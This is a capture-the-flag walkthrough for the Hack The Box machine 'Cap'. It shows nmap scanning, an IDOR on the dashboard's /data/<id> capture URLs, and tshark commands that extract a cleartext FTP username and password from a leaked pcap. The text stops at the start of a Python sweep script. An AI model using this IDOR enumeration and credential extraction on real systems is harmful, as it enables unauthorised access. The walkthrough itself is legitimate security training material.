HTB | Cap - Machines
Last edited: Apr 7, 2026
https://app.hackthebox.com/machines/Cap/
Cap | Walkthrough
| Phase |
|---|
| Reconnaissance |
| Foothold |
Reconnaissance
In the initial phase we use nmap to enumerate the open ports on the target machine (debugging was switched on during the -sC -sV run, which is why the NSE chatter appears before the port table):
nmap -sC -sV <MACHINE-IP>
# or: sudo nmap -sS <MACHINE-IP>
nopedawn@npdn ~/L/H/S/Cap> nmap -sC -sV 10.129.19.17
Starting Nmap 7.80 ( https://nmap.org ) at 2026-04-07 09:17 WIB
Debugging Increased to 1.
NSE: Script scanning 10.129.19.17.
NSE: Starting runlevel 1 (of 3) scan.
NSE: Starting ftp-bounce against 10.129.19.17:21.
NSE: Starting weblogic-t3-info against 10.129.19.17:80.
NSE: Starting sshv1 against 10.129.19.17:22.
NSE: Starting http-favicon against 10.129.19.17:80.
NSE: Starting vmware-version against 10.129.19.17:80.
NSE: Starting http-ls against 10.129.19.17:80.
NSE: Starting address-info against 10.129.19.17.
NSE: Finished address-info against 10.129.19.17.
NSE: Starting http-title against 10.129.19.17:80.
NSE: Starting http-webdav-scan against 10.129.19.17:80.
NSE: Starting http-svn-enum against 10.129.19.17:80.
NSE: Starting fingerprint-strings against 10.129.19.17:80.
NSE: [fingerprint-strings 10.129.19.17:80] FourOhFourRequest:>>>HTTP/1.0 404 NOT FOUND
Server: gunicorn
Date: Tue, 07 Apr 2026 02:17:54 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 232
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
<<<
NSE: [fingerprint-strings 10.129.19.17:80] GetRequest:>>>HTTP/1.0 200 OK
Server: gunicorn
Date: Tue, 07 Apr 2026 02:17:47 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19386
<!DOCTYPE html>
<html class="no-js" lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<title>Security Dashboard</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
<link rel="stylesheet" href="/static/css/bootstrap.min.css">
<link rel="stylesheet" href="/static/css/font-awesome.min.css">
<link rel="stylesheet" href="/static/css/themify-icons.css">
<link rel="stylesheet" href="/static/css/metisMenu.css">
<link rel="stylesheet" href="/static/css/owl.carousel.min.css">
<link rel="stylesheet" href="/static/css/slicknav.min.css">
<!-- amchar<<<
NSE: [fingerprint-strings 10.129.19.17:80] HTTPOptions:>>>HTTP/1.0 200 OK
Server: gunicorn
Date: Tue, 07 Apr 2026 02:17:47 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Allow: GET, HEAD, OPTIONS
Content-Length: 0
<<<
NSE: [fingerprint-strings 10.129.19.17:80] RTSPRequest:>>>HTTP/1.1 400 Bad Request
Connection: close
Content-Type: text/html
Content-Length: 196
<html>
<head>
<title>Bad Request</title>
</head>
<body>
<h1><p>Bad Request</p></h1>
Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
</body>
</html>
<<<
NSE: [fingerprint-strings 10.129.19.17:80] SIPOptions:>>>HTTP/1.1 400 Bad Request
Connection: close
Content-Type: text/html
Content-Length: 195
<html>
<head>
<title>Bad Request</title>
</head>
<body>
<h1><p>Bad Request</p></h1>
Invalid HTTP Version 'Invalid HTTP Version: 'SIP/2.0''
</body>
</html>
<<<
NSE: Finished fingerprint-strings against 10.129.19.17:80.
NSE: Starting sslv2 against 10.129.19.17:21.
NSE: Starting http-ntlm-info against 10.129.19.17:80.
NSE: Starting http-cors against 10.129.19.17:80.
NSE: Starting http-git against 10.129.19.17:80.
NSE: Starting https-redirect against 10.129.19.17:80.
NSE: Finished https-redirect against 10.129.19.17:80.
NSE: Starting xmlrpc-methods against 10.129.19.17:80.
NSE: Starting ftp-syst against 10.129.19.17:21.
NSE: Starting ssh-hostkey against 10.129.19.17:22.
NSE: Starting http-svn-info against 10.129.19.17:80.
NSE: Starting http-trane-info against 10.129.19.17:80.
NSE: Starting ftp-anon against 10.129.19.17:21.
NSE: Starting http-auth against 10.129.19.17:80.
NSE: Starting hnap-info against 10.129.19.17:80.
NSE: Starting http-robots.txt against 10.129.19.17:80.
NSE: Starting http-cookie-flags against 10.129.19.17:80.
NSE: [http-cookie-flags 10.129.19.17:80] start check of /
NSE: Starting skypev2-version against 10.129.19.17:80.
NSE: Finished skypev2-version against 10.129.19.17:80.
NSE: Starting http-methods against 10.129.19.17:80.
NSE: Starting http-generator against 10.129.19.17:80.
NSE: Finished sshv1 against 10.129.19.17:22.
NSE: [sslv2 10.129.19.17:21] Can't connect using STARTTLS: FTP AUTH TLS error: Please login with USER and PASS.
NSE: Finished sslv2 against 10.129.19.17:21.
NSE: [ftp-bounce 10.129.19.17:21] Authentication rejected: 530 Login incorrect.
NSE: Finished ftp-bounce against 10.129.19.17:21.
NSE: Finished ftp-anon against 10.129.19.17:21.
NSE: Finished ftp-syst against 10.129.19.17:21.
NSE: Finished ssh-hostkey against 10.129.19.17:22.
NSE: Finished weblogic-t3-info against 10.129.19.17:80.
NSE: [vmware-version 10.129.19.17:80] Couldn't download file: /sdk
NSE: Finished vmware-version against 10.129.19.17:80.
NSE: [http-webdav-scan 10.129.19.17:80] Target isn't reporting WebDAV
NSE: [http-favicon 10.129.19.17:80] Got icon URL /static/images/icon/favicon.ico.
NSE: Finished http-ls against 10.129.19.17:80.
NSE: Finished http-title against 10.129.19.17:80.
NSE: Finished http-svn-enum against 10.129.19.17:80.
NSE: Finished http-ntlm-info against 10.129.19.17:80.
NSE: Finished http-git against 10.129.19.17:80.
NSE: Finished xmlrpc-methods against 10.129.19.17:80.
NSE: Finished http-svn-info against 10.129.19.17:80.
NSE: [http-trane-info 10.129.19.17:80] HTTP: Host returns proper 404 result.
NSE: [hnap-info 10.129.19.17:80] HTTP: Host returns proper 404 result.
NSE: Finished http-robots.txt against 10.129.19.17:80.
NSE: Finished http-webdav-scan against 10.129.19.17:80.
NSE: [http-methods 10.129.19.17:80] HTTP Status for OPTIONS is 200
NSE: [http-favicon 10.129.19.17:80] No favicon found.
NSE: Finished http-favicon against 10.129.19.17:80.
NSE: Finished hnap-info against 10.129.19.17:80.
NSE: [http-methods 10.129.19.17:80] Response Code to Random Method is 405
NSE: Finished http-trane-info against 10.129.19.17:80.
NSE: Finished http-auth against 10.129.19.17:80.
NSE: [http-cookie-flags 10.129.19.17:80] end check of / : 0 issues found
NSE: Finished http-cookie-flags against 10.129.19.17:80.
NSE: Finished http-generator against 10.129.19.17:80.
NSE: Finished http-methods against 10.129.19.17:80.
NSE: Finished http-cors against 10.129.19.17:80.
NSE: Starting runlevel 2 (of 3) scan.
NSE: Starting rpc-grind against 10.129.19.17:80.
NSE: Starting tls-alpn against 10.129.19.17:21.
NSE: [tls-alpn 10.129.19.17:21] Connection to server failed: Previous STARTTLS attempt failed
NSE: [tls-alpn 10.129.19.17:21] Client hello failed with 15 protocols
NSE: Finished tls-alpn against 10.129.19.17:21.
NSE: Starting ssl-cert against 10.129.19.17:21.
NSE: Starting http-server-header against 10.129.19.17:80.
NSE: Starting tls-nextprotoneg against 10.129.19.17:21.
NSE: [tls-nextprotoneg 10.129.19.17:21] Connection to server failed: Previous STARTTLS attempt failed
NSE: Finished tls-nextprotoneg against 10.129.19.17:21.
NSE: Starting ssl-date against 10.129.19.17:21.
NSE: Finished ssl-date against 10.129.19.17:21.
NSE: Finished http-server-header against 10.129.19.17:80.
NSE: [ssl-cert 10.129.19.17:21] Specialized function error: Failed to connect to server: FTP AUTH TLS error: Please login with USER and PASS.
NSE: [ssl-cert 10.129.19.17:21] getCertificate error: Failed to connect to server
NSE: Finished ssl-cert against 10.129.19.17:21.
NSE: [rpc-grind 10.129.19.17:80] isRPC didn't receive response.
NSE: [rpc-grind 10.129.19.17:80] Target port 80 is not a RPC port.
NSE: Finished rpc-grind against 10.129.19.17:80.
NSE: Starting runlevel 3 (of 3) scan.
Nmap scan report for 10.129.19.17
Host is up (0.14s latency).
Scanned at 2026-04-07 09:17:20 WIB for 165s
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ssl-date:
|_ ERROR: Unable to obtain data from the target
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Tue, 07 Apr 2026 02:17:54 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Tue, 07 Apr 2026 02:17:47 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
| <!DOCTYPE html>
| <html class="no-js" lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Security Dashboard</title>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
| <link rel="stylesheet" href="/static/css/bootstrap.min.css">
| <link rel="stylesheet" href="/static/css/font-awesome.min.css">
| <link rel="stylesheet" href="/static/css/themify-icons.css">
| <link rel="stylesheet" href="/static/css/metisMenu.css">
| <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
| <link rel="stylesheet" href="/static/css/slicknav.min.css">
| <!-- amchar
| HTTPOptions:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Tue, 07 Apr 2026 02:17:47 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Allow: GET, HEAD, OPTIONS
| Content-Length: 0
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 196
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
| </body>
| </html>
| SIPOptions:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 195
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid HTTP Version 'Invalid HTTP Version: 'SIP/2.0''
| </body>
|_ </html>
|_http-server-header: gunicorn
|_http-title: Security Dashboard
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.80%I=7%D=4/7%Time=69D4694B%P=x86_64-pc-linux-gnu%r(GetRe
SF:quest,103E,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20T
SF:ue,\x2007\x20Apr\x202026\x2002:17:47\x20GMT\r\nConnection:\x20close\r\n
SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x201938
SF:6\r\n\r\n<!DOCTYPE\x20html>\n<html\x20class=\"no-js\"\x20lang=\"en\">\n
SF:\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20
SF:<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\x
SF:20\x20\x20<title>Security\x20Dashboard</title>\n\x20\x20\x20\x20<meta\x
SF:20name=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1
SF:\">\n\x20\x20\x20\x20<link\x20rel=\"shortcut\x20icon\"\x20type=\"image/
SF:png\"\x20href=\"/static/images/icon/favicon\.ico\">\n\x20\x20\x20\x20<l
SF:ink\x20rel=\"stylesheet\"\x20href=\"/static/css/bootstrap\.min\.css\">\
SF:n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/font
SF:-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20h
SF:ref=\"/static/css/themify-icons\.css\">\n\x20\x20\x20\x20<link\x20rel=\
SF:"stylesheet\"\x20href=\"/static/css/metisMenu\.css\">\n\x20\x20\x20\x20
SF:<link\x20rel=\"stylesheet\"\x20href=\"/static/css/owl\.carousel\.min\.c
SF:ss\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/cs
SF:s/slicknav\.min\.css\">\n\x20\x20\x20\x20<!--\x20amchar")%r(HTTPOptions
SF:,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Tue,\x20
SF:07\x20Apr\x202026\x2002:17:47\x20GMT\r\nConnection:\x20close\r\nContent
SF:-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20GET,\x20HEAD,\x20OPT
SF:IONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"HTTP/1\.1\x20
SF:400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type:\x20text/
SF:html\r\nContent-Length:\x20196\r\n\r\n<html>\n\x20\x20<head>\n\x20\x20\
SF:x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n\x20\x20<body>\n
SF:\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x20\x20\x20Invalid
SF:\x20HTTP\x20Version\x20'Invalid\x20HTTP\x20Version:\x20'RTSP/
SF:1\.0''\n\x20\x20</body>\n</html>\n")%r(FourOhFourRequest,189,
SF:"HTTP/1\.0\x20404\x20NOT\x20FOUND\r\nServer:\x20gunicorn\r\nDate:\x20Tu
SF:e,\x2007\x20Apr\x202026\x2002:17:54\x20GMT\r\nConnection:\x20close\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20232\r
SF:\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\x20F
SF:inal//EN\">\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>\
SF:n<p>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20serv
SF:er\.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20che
SF:ck\x20your\x20spelling\x20and\x20try\x20again\.</p>\n")%r(SIPOptions,12
SF:0,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\nConten
SF:t-Type:\x20text/html\r\nContent-Length:\x20195\r\n\r\n<html>\n\x20\x20<
SF:head>\n\x20\x20\x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n
SF:\x20\x20<body>\n\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x2
SF:0\x20\x20Invalid\x20HTTP\x20Version\x20'Invalid\x20HTTP\x20Version
SF::\x20'SIP/2\.0''\n\x20\x20</body>\n</html>\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Final times for host: srtt: 140684 rttvar: 4719 to: 159560
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
NSE: Starting runlevel 2 (of 3) scan.
NSE: Starting runlevel 3 (of 3) scan.
Read from /usr/bin/../share/nmap: nmap-payloads nmap-service-probes nmap-services.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.23 seconds
nopedawn@npdn ~/L/H/S/Cap> sudo nmap -sS 10.129.19.17
[sudo] password for nopedawn:
Starting Nmap 7.80 ( https://nmap.org ) at 2026-04-07 09:22 WIB
Nmap scan report for 10.129.19.17
Host is up (0.18s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 4.29 seconds
Stripping away the NSE noise, the port scan tells us the target is a Linux machine with three TCP services open:
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicorn
First, port 80. Visiting http://10.129.19.17 in a browser shows a simple security and network monitoring dashboard for a Linux server/VPS. The Server header is gunicorn, a Python WSGI server, so the dashboard is a Python web application.
In the sidebar, the Security Snapshot tab has a button that downloads a capture of network traffic (a pcap). Let's look inside it; this time I'll use tshark for the analysis.
The following command prints the protocol hierarchy of the capture:
nopedawn@npdn ~/L/H/S/Cap> tshark -r 2.pcap -qz io,phs
===================================================================
Protocol Hierarchy Statistics
Filter:
sll frames:11 bytes:646
ip frames:11 bytes:646
tcp frames:11 bytes:646
===================================================================
Just 11 frames of TCP with nothing dissected above the transport layer, so there is nothing useful in this capture.
Back to the dashboard: the IP Config tab shows the following.
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.19.17 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 dead:beef::250:56ff:feb9:6015 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:6015 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:60:15 txqueuelen 1000 (Ethernet)
RX packets 5805 bytes 549389 (549.3 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5009 bytes 1399735 (1.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 3084 bytes 242644 (242.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3084 bytes 242644 (242.6 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
That is plain ifconfig output from the target (not ipconfig, which is the Windows command), and it confirms the machine's addresses: 10.129.19.17 on eth0 plus a global IPv6 address.
The last menu, the Network Status tab, shows the following.
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name Timer
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1001 37104 - off (0.00/0/0)
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 101 35108 - off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 0 37019 - off (0.00/0/0)
tcp 0 1 10.129.19.17:57042 1.1.1.1:53 SYN_SENT 101 47323 - on (2.57/2/0)
tcp 0 0 10.129.19.17:80 10.10.17.182:63558 ESTABLISHED 1001 47324 - off (0.00/0/0)
tcp6 0 0 :::21 :::* LISTEN 0 35999 - off (0.00/0/0)
tcp6 0 0 :::22 :::* LISTEN 0 37021 - off (0.00/0/0)
udp 0 0 127.0.0.53:53 0.0.0.0:* 101 35107 - off (0.00/0/0)
udp 0 0 0.0.0.0:68 0.0.0.0:* 0 32900 - off (0.00/0/0)
udp 0 0 127.0.0.1:54491 127.0.0.53:53 ESTABLISHED 102 47322 - off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 2 [ ACC ] SEQPACKET LISTENING 27430 - /run/udev/control
unix 2 [ ACC ] STREAM LISTENING 27414 - @/org/kernel/linux/storage/multipathd
unix 3 [ ] DGRAM 27398 - /run/systemd/notify
unix 2 [ ACC ] STREAM LISTENING 27401 - /run/systemd/private
unix 2 [ ACC ] STREAM LISTENING 27403 - /run/systemd/userdb/io.systemd.DynamicUser
unix 2 [ ACC ] STREAM LISTENING 27412 - /run/lvm/lvmpolld.socket
unix 2 [ ] DGRAM 27415 - /run/systemd/journal/syslog
unix 7 [ ] DGRAM 27423 - /run/systemd/journal/dev-log
unix 2 [ ACC ] STREAM LISTENING 27425 - /run/systemd/journal/stdout
unix 8 [ ] DGRAM 27427 - /run/systemd/journal/socket
unix 2 [ ACC ] STREAM LISTENING 26517 - /run/systemd/journal/io.systemd.journal
unix 2 [ ACC ] STREAM LISTENING 32095 - /var/run/vmware/guestServicePipe
unix 2 [ ACC ] STREAM LISTENING 32136 - /run/dbus/system_bus_socket
unix 2 [ ACC ] STREAM LISTENING 32142 - /run/snapd.socket
unix 2 [ ACC ] STREAM LISTENING 32144 - /run/snapd-snap.socket
unix 2 [ ACC ] STREAM LISTENING 32146 - /run/uuidd/request
unix 2 [ ACC ] STREAM LISTENING 33330 - /run/irqbalance//irqbalance1031.sock
unix 2 [ ACC ] STREAM LISTENING 32139 - @ISCSIADM_ABSTRACT_NAMESPACE
unix 2 [ ACC ] STREAM LISTENING 32140 - /var/snap/lxd/common/lxd/unix.socket
unix 2 [ ] DGRAM 26521 -
unix 3 [ ] STREAM CONNECTED 34548 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 33002 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 35995 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 33003 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 35560 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 34506 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 34597 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 35067 -
unix 3 [ ] STREAM CONNECTED 32228 -
unix 3 [ ] DGRAM 27399 -
unix 3 [ ] STREAM CONNECTED 35069 -
unix 3 [ ] STREAM CONNECTED 35092 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 30720 -
unix 3 [ ] STREAM CONNECTED 35070 -
unix 3 [ ] STREAM CONNECTED 33331 - /run/systemd/journal/stdout
unix 2 [ ] DGRAM 31661 -
unix 3 [ ] STREAM CONNECTED 32297 -
unix 3 [ ] STREAM CONNECTED 28854 -
unix 3 [ ] DGRAM 27400 -
unix 3 [ ] STREAM CONNECTED 35014 -
unix 3 [ ] STREAM CONNECTED 32158 -
unix 3 [ ] STREAM CONNECTED 35994 -
unix 2 [ ] DGRAM 35640 -
unix 3 [ ] STREAM CONNECTED 35998 - /run/systemd/journal/stdout
unix 2 [ ] DGRAM 27976 -
unix 3 [ ] STREAM CONNECTED 34710 -
unix 3 [ ] STREAM CONNECTED 33249 -
unix 3 [ ] STREAM CONNECTED 34504 - /run/dbus/system_bus_socket
unix 2 [ ] DGRAM 34501 -
unix 3 [ ] STREAM CONNECTED 31645 -
unix 3 [ ] STREAM CONNECTED 28996 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 30046 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 33160 -
unix 2 [ ] DGRAM 35093 -
unix 3 [ ] STREAM CONNECTED 37009 -
unix 3 [ ] STREAM CONNECTED 35997 3217/sh
unix 3 [ ] DGRAM 28774 -
unix 3 [ ] STREAM CONNECTED 31311 -
unix 3 [ ] DGRAM 27982 -
unix 3 [ ] DGRAM 28773 -
unix 2 [ ] DGRAM 34477 -
unix 3 [ ] DGRAM 32978 -
unix 3 [ ] STREAM CONNECTED 32988 -
unix 3 [ ] STREAM CONNECTED 34438 -
unix 3 [ ] DGRAM 27984 -
unix 3 [ ] STREAM CONNECTED 28995 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 34569 -
unix 3 [ ] STREAM CONNECTED 32987 -
unix 3 [ ] STREAM CONNECTED 34462 -
unix 2 [ ] DGRAM 27901 -
unix 3 [ ] DGRAM 32979 -
unix 3 [ ] STREAM CONNECTED 36280 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 31648 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 31646 - /run/systemd/journal/stdout
unix 3 [ ] DGRAM 27983 -
unix 3 [ ] STREAM CONNECTED 31312 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 33251 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 35105 -
unix 3 [ ] STREAM CONNECTED 34570 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 33333 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 35106 - /run/dbus/system_bus_socket
unix 3 [ ] DGRAM 32981 -
unix 2 [ ] DGRAM 37386 -
unix 3 [ ] STREAM CONNECTED 27866 -
unix 2 [ ] DGRAM 32976 -
unix 3 [ ] STREAM CONNECTED 33161 - /run/systemd/journal/stdout
unix 3 [ ] DGRAM 27981 -
unix 2 [ ] DGRAM 31807 -
unix 3 [ ] STREAM CONNECTED 35559 -
unix 3 [ ] STREAM CONNECTED 34503 -
unix 3 [ ] STREAM CONNECTED 34502 -
unix 3 [ ] STREAM CONNECTED 34505 - /run/dbus/system_bus_socket
unix 2 [ ] DGRAM 28771 -
unix 3 [ ] STREAM CONNECTED 30045 -
unix 3 [ ] STREAM CONNECTED 34508 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 33332 -
unix 3 [ ] DGRAM 32980 -
unix 2 [ ] DGRAM 34561 -
This is netstat output (the User, Inode, PID and Timer columns come from its -p/-o style options). Two details worth keeping in mind: the listener on port 80 runs as UID 1001 rather than root, and all of this system information is exposed to an unauthenticated visitor, which is information disclosure in its own right.
Notice the URL of the capture page: /data/2. The numeric id is taken straight from the URL, and if the server never checks whether the requester is entitled to that particular id, this is an IDOR (insecure direct object reference).
After going through the menus several times, I noticed that the id in the URL increases every time one of these menus is accessed:
/data/<id>
- Earlier: /data/2
- Now: /data/7
In the background, the dashboard appears to run a capture each time the page is requested and stores it under a new id.
In common IDOR cases, low ids such as 0, -1 or 1 often refer to special or pre-existing objects, for example the first capture ever taken on the box.
I changed the id to 0 as well, and here is what the resulting pcap file contains:
nopedawn@npdn ~/L/H/S/Cap> tshark -r 0.pcap -qz io,phs
===================================================================
Protocol Hierarchy Statistics
Filter:
sll frames:72 bytes:8759
ip frames:72 bytes:8759
tcp frames:72 bytes:8759
http frames:6 bytes:4184
data-text-lines frames:3 bytes:2906
tcp.segments frames:3 bytes:2906
ftp frames:25 bytes:2017
ftp.current-working-directory frames:25 bytes:2017
===================================================================
This time the protocol hierarchy shows FTP frames. Let's display them:
nopedawn@npdn ~/L/H/S/Cap> tshark -r 0.pcap -Y "ftp"
34 2.626895 192.168.196.16 → 192.168.196.1 FTP 76 Response: 220 (vsFTPd 3.0.3)
36 4.126500 192.168.196.1 → 192.168.196.16 FTP 69 Request: USER nathan
38 4.126630 192.168.196.16 → 192.168.196.1 FTP 90 Response: 331 Please specify the password.
40 5.424998 192.168.196.1 → 192.168.196.16 FTP 78 Request: PASS Buck3tH4TF0RM3!
42 5.432387 192.168.196.16 → 192.168.196.1 FTP 79 Response: 230 Login successful.
43 5.432801 192.168.196.1 → 192.168.196.16 FTP 62 Request: SYST
45 5.432937 192.168.196.16 → 192.168.196.1 FTP 75 Response: 215 UNIX Type: L8
47 6.309628 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,140
49 6.309874 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
50 6.310514 192.168.196.1 → 192.168.196.16 FTP 62 Request: LIST
51 6.311053 192.168.196.16 → 192.168.196.1 FTP 95 Response: 150 Here comes the directory listing.
52 6.311479 192.168.196.16 → 192.168.196.1 FTP 80 Response: 226 Directory send OK.
54 7.380771 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,141
55 7.380998 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
56 7.381554 192.168.196.1 → 192.168.196.16 FTP 66 Request: LIST -al
57 7.382165 192.168.196.16 → 192.168.196.1 FTP 95 Response: 150 Here comes the directory listing.
58 7.382504 192.168.196.16 → 192.168.196.1 FTP 80 Response: 226 Directory send OK.
60 28.031068 192.168.196.1 → 192.168.196.16 FTP 64 Request: TYPE I
61 28.031221 192.168.196.16 → 192.168.196.1 FTP 87 Response: 200 Switching to Binary mode.
62 28.031547 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,143
63 28.031688 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
64 28.031932 192.168.196.1 → 192.168.196.16 FTP 72 Request: RETR notes.txt
65 28.032072 192.168.196.16 → 192.168.196.1 FTP 82 Response: 550 Failed to open file.
67 31.127551 192.168.196.1 → 192.168.196.16 FTP 62 Request: QUIT
68 31.127652 192.168.196.16 → 192.168.196.1 FTP 70 Response: 221 Goodbye.
To print only the client side of the conversation (command and argument), use the ftp.request fields:
nopedawn@npdn ~/L/H/S/Cap> tshark -r 0.pcap -Y "ftp" -T fields -e ftp.request.command -e ftp.request.arg
USER nathan
PASS Buck3tH4TF0RM3!
SYST
PORT 192,168,196,1,212,140
LIST
PORT 192,168,196,1,212,141
LIST -al
TYPE I
PORT 192,168,196,1,212,143
RETR notes.txt
QUIT
The capture leaks a credential for the local user nathan. FTP sends the login in cleartext, and since vsftpd authenticates against system accounts, the same password is worth trying on SSH as well:
nathan:Buck3tH4TF0RM3!
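The two steps above (walking the capture ids exposed through the URL, then pulling the FTP login out of each pcap) can be scripted. The following is an added example written for this walkthrough, not code from the box or from HTB: a dependency-free reader for classic pcap files that handles the Linux cooked (SLL) link layer tshark reported above as well as Ethernet, an FTP USER/PASS extractor, and an id sweep driven by a pluggable fetch function. The sample capture it builds is constructed inline (the login values are the ones seen above, the packet framing is synthetic); the fetch callback, the SLL/Ethernet assumption and the id range are my assumptions, not something the page states.

```python
"""Sweep capture ids and extract cleartext FTP logins from the pcaps.

Added example for this walkthrough, not code from the machine or from HTB.
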